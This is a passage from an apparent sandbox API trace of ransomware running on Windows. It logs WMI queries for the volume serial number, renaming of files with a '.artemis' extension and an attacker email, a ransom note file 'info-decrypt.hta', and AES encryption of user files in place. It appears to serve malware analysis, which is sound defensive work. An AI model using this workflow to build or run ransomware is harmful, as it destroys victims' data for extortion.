CoGetContextToken (in: pToken=0x71eedc8 | out: pToken=0x71eedc8) returned 0x0 [0203.853] CoGetContextToken (in: pToken=0x71eed28 | out: pToken=0x71eed28) returned 0x0 [0203.854] WbemLocator:IUnknown:QueryInterface (in: This=0x6737048, riid=0x71eedf8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x71eedf4 | out: ppvObject=0x71eedf4*=0x6737048) returned 0x0 [0203.854] WbemLocator:IUnknown:AddRef (This=0x6737048) returned 0x3 [0203.854] WbemLocator:IUnknown:Release (This=0x6737048) returned 0x2 [0203.854] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738a80, puCount=0x71eef8c | out: puCount=0x71eef8c*=0x2) returned 0x0 [0203.854] WbemDefPath:IWbemPath:GetText (in: This=0x6738a80, lFlags=8, puBuffLength=0x71eef88*=0x0, pszText=0x0 | out: puBuffLength=0x71eef88*=0xf, pszText=0x0) returned 0x0 [0203.854] WbemDefPath:IWbemPath:GetText (in: This=0x6738a80, lFlags=8, puBuffLength=0x71eef88*=0xf, pszText="00000000000000" | out: puBuffLength=0x71eef88*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0203.854] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x71eee64 | out: ppv=0x71eee64*=0x6736e08) returned 0x0 [0203.854] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6736e08, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x71eeef8 | out: ppNamespace=0x71eeef8*=0x67482bc) returned 0x0 [0204.662] WbemLocator:IUnknown:QueryInterface (in: This=0x67482bc, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eed94 | out: ppvObject=0x71eed94*=0x781634) returned 0x0 [0204.662] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x781634, pProxy=0x67482bc, pAuthnSvc=0x71eede4, pAuthzSvc=0x71eede0, pServerPrincName=0x71eedd8, pAuthnLevel=0x71eeddc, pImpLevel=0x71eedcc, pAuthInfo=0x71eedd0, pCapabilites=0x71eedd4 | out: pAuthnSvc=0x71eede4*=0xa, pAuthzSvc=0x71eede0*=0x0, pServerPrincName=0x71eedd8, pAuthnLevel=0x71eeddc*=0x6, pImpLevel=0x71eedcc*=0x2, pAuthInfo=0x71eedd0, pCapabilites=0x71eedd4*=0x1) returned 0x0 [0204.662] WbemLocator:IUnknown:Release (This=0x781634) returned 0x1 [0204.662] WbemLocator:IUnknown:QueryInterface (in: This=0x67482bc, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eed88 | out: ppvObject=0x71eed88*=0x781654) returned 0x0 [0204.662] WbemLocator:IUnknown:QueryInterface (in: This=0x67482bc, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eed84 | out: ppvObject=0x71eed84*=0x781634) returned 0x0 [0204.662] WbemLocator:IClientSecurity:SetBlanket (This=0x781634, pProxy=0x67482bc, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0204.663] WbemLocator:IUnknown:Release (This=0x781634) returned 0x2 [0204.663] WbemLocator:IUnknown:Release (This=0x781654) returned 0x1 [0204.663] CoTaskMemFree (pv=0x77e0e8) [0204.663] WbemLocator:IUnknown:Release (This=0x6736e08) returned 0x0 [0204.663] WbemLocator:IUnknown:QueryInterface (in: This=0x67482bc, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee984 | out: ppvObject=0x71ee984*=0x781654) returned 0x0 [0204.663] WbemLocator:IUnknown:QueryInterface (in: This=0x781654, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x71ee940 | out: ppvObject=0x71ee940*=0x0) returned 0x80004002 [0204.666] WbemLocator:IUnknown:QueryInterface (in: This=0x781654, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x71ee75c | out: ppvObject=0x71ee75c*=0x0) returned 0x80004002 [0204.668] WbemLocator:IUnknown:AddRef (This=0x781654) returned 0x3 [0204.668] WbemLocator:IUnknown:QueryInterface (in: This=0x781654, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x71ee29c | out: ppvObject=0x71ee29c*=0x0) returned 0x80004002 [0204.685] WbemLocator:IUnknown:QueryInterface (in: This=0x781654, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x71ee24c | out: ppvObject=0x71ee24c*=0x0) returned 0x80004002 [0204.688] WbemLocator:IUnknown:QueryInterface (in: This=0x781654, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee258 | out: ppvObject=0x71ee258*=0x7815b4) returned 0x0 [0204.688] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x7815b4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x71ee260 | out: pCid=0x71ee260*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0204.688] WbemLocator:IUnknown:Release (This=0x7815b4) returned 0x3 [0204.688] CoGetContextToken (in: pToken=0x71ee2b8 | out: pToken=0x71ee2b8) returned 0x0 [0204.688] CoGetContextToken (in: pToken=0x71ee6c0 | out: pToken=0x71ee6c0) returned 0x0 [0204.688] WbemLocator:IUnknown:QueryInterface (in: This=0x781654, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee750 | out: ppvObject=0x71ee750*=0x78163c) returned 0x0 [0204.688] WbemLocator:IRpcOptions:Query (in: This=0x78163c, pPrx=0x781654, dwProperty=2, pdwValue=0x71ee778 | out: pdwValue=0x71ee778) returned 0x80004002 [0204.688] WbemLocator:IUnknown:Release (This=0x78163c) returned 0x3 [0204.688] WbemLocator:IUnknown:Release (This=0x781654) returned 0x2 [0204.688] CoGetContextToken (in: pToken=0x71eec98 | out: pToken=0x71eec98) returned 0x0 [0204.688] CoGetContextToken (in: pToken=0x71eebf8 | out: pToken=0x71eebf8) returned 0x0 [0204.688] WbemLocator:IUnknown:QueryInterface (in: This=0x781654, riid=0x71eecc8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x71eecc4 | out: ppvObject=0x71eecc4*=0x67482bc) returned 0x0 [0204.688] WbemLocator:IUnknown:AddRef (This=0x67482bc) returned 0x4 [0204.688] WbemLocator:IUnknown:Release (This=0x67482bc) returned 0x3 [0204.688] WbemLocator:IUnknown:Release (This=0x67482bc) returned 0x2 [0204.689] SysStringLen (param_1=0x0) returned 0x0 [0204.689] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738a10, puCount=0x71ef05c | out: puCount=0x71ef05c*=0x0) returned 0x0 [0204.689] WbemDefPath:IWbemPath:GetText (in: This=0x6738a10, lFlags=2, puBuffLength=0x71ef058*=0x0, pszText=0x0 | out: puBuffLength=0x71ef058*=0x20, pszText=0x0) returned 0x0 [0204.689] WbemDefPath:IWbemPath:GetText (in: This=0x6738a10, lFlags=2, puBuffLength=0x71ef058*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x71ef058*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0204.689] CoGetContextToken (in: pToken=0x71eecc8 | out: pToken=0x71eecc8) returned 0x0 [0204.689] WbemLocator:IUnknown:AddRef (This=0x781654) returned 0x3 [0204.689] WbemLocator:IUnknown:QueryInterface (in: This=0x781654, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eeb5c | out: ppvObject=0x71eeb5c*=0x781654) returned 0x0 [0204.689] WbemLocator:IUnknown:Release (This=0x781654) returned 0x3 [0204.689] WbemLocator:IUnknown:Release (This=0x781654) returned 0x2 [0204.689] WbemDefPath:IWbemPath:GetText (in: This=0x6738a10, lFlags=2, puBuffLength=0x71ef060*=0x0, pszText=0x0 | out: puBuffLength=0x71ef060*=0x20, pszText=0x0) returned 0x0 [0204.689] WbemDefPath:IWbemPath:GetText (in: This=0x6738a10, lFlags=2, puBuffLength=0x71ef060*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x71ef060*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0204.689] IWbemServices:GetObject (in: This=0x67482bc, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x71ef014*=0x0, ppCallResult=0x0 | out: ppObject=0x71ef014*=0x673c2c0, ppCallResult=0x0) returned 0x0 [0209.820] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738a80, puCount=0x71ef014 | out: puCount=0x71ef014*=0x2) returned 0x0 [0209.820] WbemDefPath:IWbemPath:GetText (in: This=0x6738a80, lFlags=4, puBuffLength=0x71ef010*=0x0, pszText=0x0 | out: puBuffLength=0x71ef010*=0xf, pszText=0x0) returned 0x0 [0209.820] WbemDefPath:IWbemPath:GetText (in: This=0x6738a80, lFlags=4, puBuffLength=0x71ef010*=0xf, pszText="00000000000000" | out: puBuffLength=0x71ef010*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0209.820] IWbemClassObject:Get (in: This=0x673c2c0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x71ef010*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3508c04*=0, plFlavor=0x3508c08*=0 | out: pVal=0x71ef010*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3508c04*=8, plFlavor=0x3508c08*=0) returned 0x0 [0209.820] SysStringByteLen (bstr="9C354B42") returned 0x10 [0209.820] SysStringByteLen (bstr="9C354B42") returned 0x10 [0209.820] IWbemClassObject:Get (in: This=0x673c2c0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x71ef018*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3508c04*=8, plFlavor=0x3508c08*=0 | out: pVal=0x71ef018*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3508c04*=8, plFlavor=0x3508c08*=0) returned 0x0 [0209.820] SysStringByteLen (bstr="9C354B42") returned 0x10 [0209.820] SysStringByteLen (bstr="9C354B42") returned 0x10 [0209.820] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst", nBufferLength=0x105, lpBuffer=0x71eec18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst", lpFilePart=0x0) returned 0x51 [0209.820] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst.id-9C354B42.[khalate@tutanota.com].artemis", nBufferLength=0x105, lpBuffer=0x71eec18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst.id-9C354B42.[khalate@tutanota.com].artemis", lpFilePart=0x0) returned 0x7c [0209.820] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef078) returned 1 [0209.820] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\adobecmapfnt10.lst"), fInfoLevelId=0x0, lpFileInformation=0x71ef0f4 | out: lpFileInformation=0x71ef0f4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xecb5bdd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xecb5bdd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0x2106f3a0, ftLastWriteTime.dwHighDateTime=0x1d6a20b, nFileSizeHigh=0x0, nFileSizeLow=0x8b40)) returned 1 [0209.821] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef074) returned 1 [0209.821] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\adobecmapfnt10.lst"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst.id-9C354B42.[khalate@tutanota.com].artemis" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\adobecmapfnt10.lst.id-9c354b42.[khalate@tutanota.com].artemis")) returned 1 [0209.821] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst", nBufferLength=0x105, lpBuffer=0x71eecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst", lpFilePart=0x0) returned 0x50 [0209.821] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst", nBufferLength=0x105, lpBuffer=0x71eecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst", lpFilePart=0x0) returned 0x50 [0209.821] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x71eecbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\info-decrypt.hta", lpFilePart=0x0) returned 0x4f [0209.821] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef11c) returned 1 [0209.821] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x71ef198 | out: lpFileInformation=0x71ef198*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x20677780, ftCreationTime.dwHighDateTime=0x1d6a20b, ftLastAccessTime.dwLowDateTime=0x20677780, ftLastAccessTime.dwHighDateTime=0x1d6a20b, ftLastWriteTime.dwLowDateTime=0x20677780, ftLastWriteTime.dwHighDateTime=0x1d6a20b, nFileSizeHigh=0x0, nFileSizeLow=0x1557)) returned 1 [0209.822] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef118) returned 1 [0209.822] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst", nBufferLength=0x105, lpBuffer=0x71eec38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst", lpFilePart=0x0) returned 0x50 [0209.822] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef0e4) returned 1 [0209.822] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\adobesysfnt10.lst"), fInfoLevelId=0x0, lpFileInformation=0x350942c | out: lpFileInformation=0x350942c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xecb5bdd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xecb5bdd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xd9c071a0, ftLastWriteTime.dwHighDateTime=0x1d2e625, nFileSizeHigh=0x0, nFileSizeLow=0x21cdb)) returned 1 [0210.037] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef0e0) returned 1 [0210.037] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst", nBufferLength=0x105, lpBuffer=0x71eeb24, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst", lpFilePart=0x0) returned 0x50 [0210.037] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef018) returned 1 [0210.037] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\adobesysfnt10.lst"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x348 [0210.037] GetFileType (hFile=0x348) returned 0x1 [0210.037] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef014) returned 1 [0210.037] GetFileType (hFile=0x348) returned 0x1 [0210.037] GetFileSize (in: hFile=0x348, lpFileSizeHigh=0x71ef120 | out: lpFileSizeHigh=0x71ef120*=0x0) returned 0x21cdb [0210.058] ReadFile (in: hFile=0x348, lpBuffer=0x31486f58, nNumberOfBytesToRead=0x21cdb, lpNumberOfBytesRead=0x71ef0cc, lpOverlapped=0x0 | out: lpBuffer=0x31486f58*, lpNumberOfBytesRead=0x71ef0cc*=0x21cdb, lpOverlapped=0x0) returned 1 [0210.130] CloseHandle (hObject=0x348) returned 1 [0210.130] CryptAcquireContextW (in: phProv=0x71ef06c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x71ef06c*=0x7a9fd0) returned 1 [0210.131] CryptGenRandom (in: hProv=0x7a9fd0, dwLen=0x10, pbBuffer=0x3509a18 | out: pbBuffer=0x3509a18) returned 1 [0211.860] CryptImportKey (in: hProv=0x7a9fd0, pbData=0x36b2280, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x71ef03c | out: phKey=0x71ef03c*=0x77ad70) returned 1 [0211.861] CryptContextAddRef (hProv=0x7a9fd0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0211.861] CryptContextAddRef (hProv=0x7a9fd0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0211.861] CryptDuplicateKey (in: hKey=0x77ad70, pdwReserved=0x0, dwFlags=0x0, phKey=0x71ef02c | out: phKey=0x71ef02c*=0x77b430) returned 1 [0211.861] CryptContextAddRef (hProv=0x7a9fd0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0211.861] CryptSetKeyParam (hKey=0x77b430, dwParam=0x4, pbData=0x36b2360*=0x1, dwFlags=0x0) returned 1 [0211.861] CryptSetKeyParam (hKey=0x77b430, dwParam=0x1, pbData=0x36b232c, dwFlags=0x0) returned 1 [0211.863] CryptEncrypt (in: hKey=0x77b430, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x314bd8b0*, pdwDataLen=0x71ef098*=0x21ce0, dwBufLen=0x21ce0 | out: pbData=0x314bd8b0*, pdwDataLen=0x71ef098*=0x21ce0) returned 1 [0211.864] CryptEncrypt (in: hKey=0x77b430, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x36b2388*, pdwDataLen=0x71ef0a0*=0x0, dwBufLen=0x10 | out: pbData=0x36b2388*, pdwDataLen=0x71ef0a0*=0x10) returned 1 [0211.874] CryptDestroyKey (hKey=0x77ad70) returned 1 [0211.874] CryptReleaseContext (hProv=0x7a9fd0, dwFlags=0x0) returned 1 [0211.874] CryptReleaseContext (hProv=0x7a9fd0, dwFlags=0x0) returned 1 [0211.874] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst", nBufferLength=0x105, lpBuffer=0x71eeb10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst", lpFilePart=0x0) returned 0x50 [0211.874] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef004) returned 1 [0211.874] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeSysFnt10.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\adobesysfnt10.lst"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3dc [0211.875] GetFileType (hFile=0x3dc) returned 0x1 [0211.875] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef000) returned 1 [0211.875] GetFileType (hFile=0x3dc) returned 0x1 [0211.875] WriteFile (in: hFile=0x3dc, lpBuffer=0x3153f5f0*, nNumberOfBytesToWrite=0x21ef0, lpNumberOfBytesWritten=0x71ef0c0, lpOverlapped=0x0 | out: lpBuffer=0x3153f5f0*, lpNumberOfBytesWritten=0x71ef0c0*=0x21ef0, lpOverlapped=0x0) returned 1 [0211.878] CloseHandle (hObject=0x3dc) returned 1 [0211.881] CoTaskMemAlloc (cb=0x20c) returned 0x6f2ec08 [0211.881] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x6f2ec08 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0211.881] CoTaskMemFree (pv=0x6f2ec08) [0211.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x71eeaf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0211.881] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71ef040 | out: ppv=0x71ef040*=0x72015c) returned 0x0 [0211.882] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x71ef038 | out: pAptType=0x71ef038*=1) returned 0x0 [0211.882] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x71ef03c | out: ppvObject=0x71ef03c*=0x0) returned 0x80004002 [0211.882] IUnknown:Release (This=0x72015c) returned 0x1 [0211.883] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71ee9a8 | out: ppv=0x71ee9a8*=0x6736f28) returned 0x0 [0211.884] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736f28, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x71eebc0 | out: ppvObject=0x71eebc0*=0x0) returned 0x80004002 [0211.884] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736f28, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eebd4 | out: ppvObject=0x71eebd4*=0x6738cb0) returned 0x0 [0211.884] WbemDefPath:IUnknown:Release (This=0x6736f28) returned 0x0 [0211.884] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738cb0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee7f4 | out: ppvObject=0x71ee7f4*=0x6738cb0) returned 0x0 [0211.884] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738cb0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x71ee7b0 | out: ppvObject=0x71ee7b0*=0x0) returned 0x80004002 [0211.884] WbemDefPath:IUnknown:AddRef (This=0x6738cb0) returned 0x3 [0211.884] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738cb0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x71ee10c | out: 